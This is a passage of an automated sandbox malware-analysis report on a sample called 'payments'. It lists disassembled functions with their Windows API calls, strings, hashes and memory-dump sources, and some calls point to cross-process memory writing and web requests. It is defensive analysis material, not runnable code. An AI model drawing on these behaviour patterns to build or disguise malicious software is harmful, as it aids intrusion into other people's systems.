                                                                                                                          • Opcode Fuzzy Hash: 71533dfd62a601d899be8404980b56e0317a2ea90bc21dd8b75effb6496390cb
                                                                                                                          • Instruction Fuzzy Hash: 56512F75A0020DAFCF50DF68C9C0ABE77B6AB55320F208659F965DB290D730EE41DB51
                                                                                                                          Function 00CCC410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00CCC462
                                                                                                                          • __itow.LIBCMT ref: 00CCC49C
                                                                                                                            • Part of subcall function 00CCC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00CCC753
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00CCC505
                                                                                                                          • __itow.LIBCMT ref: 00CCC55A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$__itow
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3379773720-2594219639
                                                                                                                          • Opcode ID: 64852a47bfc57020f621ad91e95c69a0bbc3f4b370818bc9a1d74dfe4f88c02c
                                                                                                                          • Instruction ID: 989672ecc89ca40c0f712a074a1822cf38740f453b822405da0cb586e3d4bc01
                                                                                                                          • Opcode Fuzzy Hash: 64852a47bfc57020f621ad91e95c69a0bbc3f4b370818bc9a1d74dfe4f88c02c
                                                                                                                          • Instruction Fuzzy Hash: 8141A571A00608AFDF25DF54C896FFE7BB9AF49700F00405DFA19A7281DB709A49DBA1
                                                                                                                          Function 00CCC189 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CCBC08,?,?,00000034,00000800,?,00000034), ref: 00CD4335
                                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00CCC1D3
                                                                                                                            • Part of subcall function 00CD42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CCBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00CD4300
                                                                                                                            • Part of subcall function 00CD422F: GetWindowThreadProcessId.USER32(?,?), ref: 00CD425A
                                                                                                                            • Part of subcall function 00CD422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CCBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00CD426A
                                                                                                                            • Part of subcall function 00CD422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CCBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00CD4280
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CCC240
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CCC28D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                          • String ID: @$@U=u
                                                                                                                          • API String ID: 4150878124-826235744
                                                                                                                          • Opcode ID: 5f1b51c3a65a7c464a20e0e02114cae7404eb4876d726b32627fdbe4c5914f99
                                                                                                                          • Instruction ID: 5da789d2958ffaa52ac953f7670ffc852191ad07e2102d80db3b73fee4962099
                                                                                                                          • Opcode Fuzzy Hash: 5f1b51c3a65a7c464a20e0e02114cae7404eb4876d726b32627fdbe4c5914f99
                                                                                                                          • Instruction Fuzzy Hash: 39413B76900218BFDB15DFA4CC81EEEB7B8AB09300F044099FA55B7291DB716E45DB61
                                                                                                                          Function 00CD0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CD027B
                                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CD02B1
                                                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CD02C2
                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CD0344
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                          • String ID: DllGetClassObject
                                                                                                                          • API String ID: 753597075-1075368562
                                                                                                                          • Opcode ID: 13432ec821c3735b7ec286c0dfcac8575d0a24888406abf88fd72f6c8c8e4fb5
                                                                                                                          • Instruction ID: 38f106a9df1955557662aec00b55202793956ce843ece77504d5870038dbd6fa
                                                                                                                          • Opcode Fuzzy Hash: 13432ec821c3735b7ec286c0dfcac8575d0a24888406abf88fd72f6c8c8e4fb5
                                                                                                                          • Instruction Fuzzy Hash: 36413071600204EFDB05CF59C885BAA7BB9EF44314F2480AEAE09DF356D7B1DA45CBA0
                                                                                                                          Function 00CD5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CD5075
                                                                                                                          • GetMenuItemInfoW.USER32 ref: 00CD5091
                                                                                                                          • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00CD50D7
                                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D51708,00000000), ref: 00CD5120
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                                                                          • String ID: 0
                                                                                                                          • API String ID: 1173514356-4108050209
                                                                                                                          • Opcode ID: 66430067abc7a90cb7ebfd2a1bcffc65976e1d54bc97d26da9438482a34ec936
                                                                                                                          • Instruction ID: 4f1e6264c3f0e97c69ed335fbf0b2e4fde8fcebda6f2751fde172d608a08fb89
                                                                                                                          • Opcode Fuzzy Hash: 66430067abc7a90cb7ebfd2a1bcffc65976e1d54bc97d26da9438482a34ec936
                                                                                                                          • Instruction Fuzzy Hash: 37419171204701AFD720DF28D885B6EB7E5AF85314F144A5FFAA697391DB30E900CB62
                                                                                                                          Function 00CFB544 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CFB5D1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InvalidateRect
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 634782764-2594219639
                                                                                                                          • Opcode ID: 51c51a2cd590e00a3678f722274854e3be46f7041d9a50d4d9083c7af8237e63
                                                                                                                          • Instruction ID: 1c3b8dfcec38c61cc388e0b088c5f2847a28e1222df267da58a3f7ac0ad918a6
                                                                                                                          • Opcode Fuzzy Hash: 51c51a2cd590e00a3678f722274854e3be46f7041d9a50d4d9083c7af8237e63
                                                                                                                          • Instruction Fuzzy Hash: FB31BE7460120CBBEFA88F19CC89FF87766AB05350F648501FB61D62E1CB34AE409B63
                                                                                                                          Function 00CF0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CharLowerBuffW.USER32(?,?,?,?), ref: 00CF0587
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharLower
                                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                                          • API String ID: 2358735015-567219261
                                                                                                                          • Opcode ID: f69f575837f7e7af351e3e2bfd6a60c722655efa9ff7eefed192e4f6c569ed8e
                                                                                                                          • Instruction ID: 901f36b33797b898ed0c5c31a2c8fb940ae3f18970d86795b5519f5c1ca6a6c0
                                                                                                                          • Opcode Fuzzy Hash: f69f575837f7e7af351e3e2bfd6a60c722655efa9ff7eefed192e4f6c569ed8e
                                                                                                                          • Instruction Fuzzy Hash: 7131CF3050021AAFCF00EF54C8419FEB3B4FF45324B208629F936A76D2DB71AA15CB90
                                                                                                                          Function 00CE43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CE4401
                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CE4427
                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CE4457
                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00CE449E
                                                                                                                            • Part of subcall function 00CE5052: GetLastError.KERNEL32(?,?,00CE43CC,00000000,00000000,00000001), ref: 00CE5067
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1951874230-3916222277
                                                                                                                          • Opcode ID: febba3bf2c7bffb7061835f506a6d0b1858caceedc2fc28869303655ed09333a
                                                                                                                          • Instruction ID: 2aba9ce191c37040ab40468b6077355ec60ef8a12e752c2e761de40487822215
                                                                                                                          • Opcode Fuzzy Hash: febba3bf2c7bffb7061835f506a6d0b1858caceedc2fc28869303655ed09333a
                                                                                                                          • Instruction Fuzzy Hash: 222192B2600248BFE7159F56CC85EBFB6EDEB48758F10801AF605D2280EB648E05A770
                                                                                                                          Function 00CF90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAD1BA
                                                                                                                            • Part of subcall function 00CAD17C: GetStockObject.GDI32(00000011), ref: 00CAD1CE
                                                                                                                            • Part of subcall function 00CAD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAD1D8
                                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CF915C
                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00CF9163
                                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CF9178
                                                                                                                          • DestroyWindow.USER32(?), ref: 00CF9180
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                          • String ID: SysAnimate32
                                                                                                                          • API String ID: 4146253029-1011021900
                                                                                                                          • Opcode ID: 4aa2c10678b63c0eb5bd5a995141f60e636205e4fe6a9976ccf51fa71a851bde
                                                                                                                          • Instruction ID: e6c30519ad96cb4ccef980e86186e694db9832126880e84bade9ae7ae3b363b6
                                                                                                                          • Opcode Fuzzy Hash: 4aa2c10678b63c0eb5bd5a995141f60e636205e4fe6a9976ccf51fa71a851bde
                                                                                                                          • Instruction Fuzzy Hash: 64218E7160020ABBEF504E659C85FFE37ADEB99364F108628FA2592190C731DD52A761
                                                                                                                          Function 00CD9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00CD9588
                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CD95B9
                                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00CD95CB
                                                                                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00CD9605
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateHandle$FilePipe
                                                                                                                          • String ID: nul
                                                                                                                          • API String ID: 4209266947-2873401336
                                                                                                                          • Opcode ID: 524a448849615d99932370aca512260e33c8fba4a10ac89c16c2036ee87e8811
                                                                                                                          • Instruction ID: c2c61648848c9fb6fd8611e65090f478f9e3a9e0d7d64772547b248581d0805e
                                                                                                                          • Opcode Fuzzy Hash: 524a448849615d99932370aca512260e33c8fba4a10ac89c16c2036ee87e8811
                                                                                                                          • Instruction Fuzzy Hash: B0214F78600305ABDB219F25EC45A9A77A4EF55724F204B2AFAA1D73E0E770DA45CB20
                                                                                                                          Function 00CD9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00CD9653
                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CD9683
                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00CD9694
                                                                                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00CD96CE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateHandle$FilePipe
                                                                                                                          • String ID: nul
                                                                                                                          • API String ID: 4209266947-2873401336
                                                                                                                          • Opcode ID: 0d43361e9c5fa99a4916cd017df8f6ad9076e7e0ddf68c2ea0b37193bd594775
                                                                                                                          • Instruction ID: 0a103b2e1d8f981dc331e58962e55345d01874b62dcbe9adcc06396daa6eab04
                                                                                                                          • Opcode Fuzzy Hash: 0d43361e9c5fa99a4916cd017df8f6ad9076e7e0ddf68c2ea0b37193bd594775
                                                                                                                          • Instruction Fuzzy Hash: E621A479600305ABDB609F699C44E9E77E8EF45724F204A5AFAB1D33D0EB70D942CB20
                                                                                                                          Function 00CDDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00CDDB0A
                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CDDB5E
                                                                                                                          • __swprintf.LIBCMT ref: 00CDDB77
                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00D2DC00), ref: 00CDDBB5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                          • String ID: %lu
                                                                                                                          • API String ID: 3164766367-685833217
                                                                                                                          • Opcode ID: e42a05a65f36b96730b2fb2748a9adb81038824159469d97b6ac83f88f197429
                                                                                                                          • Instruction ID: e2cfa4616e314572c3d4fb374fff38af3001f5c336f094c0c866a02e27b79d88
                                                                                                                          • Opcode Fuzzy Hash: e42a05a65f36b96730b2fb2748a9adb81038824159469d97b6ac83f88f197429
                                                                                                                          • Instruction Fuzzy Hash: 65217135A00208AFCB10EFA4DD85DEEB7B9EF49704B114069F605E7351DB71EA41DB60
                                                                                                                          Function 00CCC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CCC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCC84A
                                                                                                                            • Part of subcall function 00CCC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCC85D
                                                                                                                            • Part of subcall function 00CCC82D: GetCurrentThreadId.KERNEL32 ref: 00CCC864
                                                                                                                            • Part of subcall function 00CCC82D: AttachThreadInput.USER32(00000000), ref: 00CCC86B
                                                                                                                          • GetFocus.USER32 ref: 00CCCA05
                                                                                                                            • Part of subcall function 00CCC876: GetParent.USER32(?), ref: 00CCC884
                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00CCCA4E
                                                                                                                          • EnumChildWindows.USER32(?,00CCCAC4), ref: 00CCCA76
                                                                                                                          • __swprintf.LIBCMT ref: 00CCCA90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                                                          • String ID: %s%d
                                                                                                                          • API String ID: 3187004680-1110647743
                                                                                                                          • Opcode ID: c5b1c9ae33da7856176530e4d828d08a8f0dfcd884be9450243a0eb2f30797af
                                                                                                                          • Instruction ID: 941bf3dc9c39f42017039aa53dbafdd0125094d4ee2b60b1cd05763255e329cb
                                                                                                                          • Opcode Fuzzy Hash: c5b1c9ae33da7856176530e4d828d08a8f0dfcd884be9450243a0eb2f30797af
                                                                                                                          • Instruction Fuzzy Hash: 151172715002097BDF11BF60DCC9FEA3769AB54714F00806AFE1CAA186CF709546EB70
                                                                                                                          Function 00CAD17C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAD1BA
                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00CAD1CE
                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAD1D8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3970641297-2594219639
                                                                                                                          • Opcode ID: 235687dec8d44d47ff34bc9d14fe783335513f2572c2d9af92dab28aa21aa594
                                                                                                                          • Instruction ID: cab8cd8a48df157fcd5984807a0e181aa7b562be939c60552fec5071a96531cc
                                                                                                                          • Opcode Fuzzy Hash: 235687dec8d44d47ff34bc9d14fe783335513f2572c2d9af92dab28aa21aa594
                                                                                                                          • Instruction Fuzzy Hash: 5211617250160ABFEF114F90DC54EEE7B6AFF0A368F044115FB1692150CB319E61DBA0
                                                                                                                          Function 00CB7452 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CB7A0D: __getptd_noexit.LIBCMT ref: 00CB7A0E
                                                                                                                          • __lock.LIBCMT ref: 00CB748F
